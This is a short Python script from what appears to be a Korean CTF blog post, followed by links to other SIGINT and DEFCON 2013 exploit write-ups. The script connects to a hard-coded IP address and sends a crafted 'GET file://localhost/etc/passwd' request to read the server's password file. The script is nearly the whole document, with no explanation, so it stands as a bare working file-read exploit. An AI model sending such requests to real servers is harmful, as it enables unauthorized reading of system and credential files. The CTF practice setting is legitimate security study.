from socket import * import sys s = socket(AF_INET, SOCK_STREAM) s.connect(('188.40.147.125',8080)) #s.connect(('localhost',8080)) s.send("GET file://localhost/etc/passwd HTTP/1.1\r\n\r\n") get=s.recv(65000) print get
'Computer Security > CTF' 카테고리의 다른 글
[SIGINT 2013] trollsex(tr0llsex) exploit (0) | 2013.07.08 |
---|---|
[SIGINT 2013] mail exploit (0) | 2013.07.08 |
[defcon 2013] annyong exploit (1) | 2013.06.28 |
[defcon 2013] gnireenigne, musicman, exploit (0) | 2013.06.17 |
[defcon 2013] \xff\xe4\xcc, linked, exploit (0) | 2013.06.17 |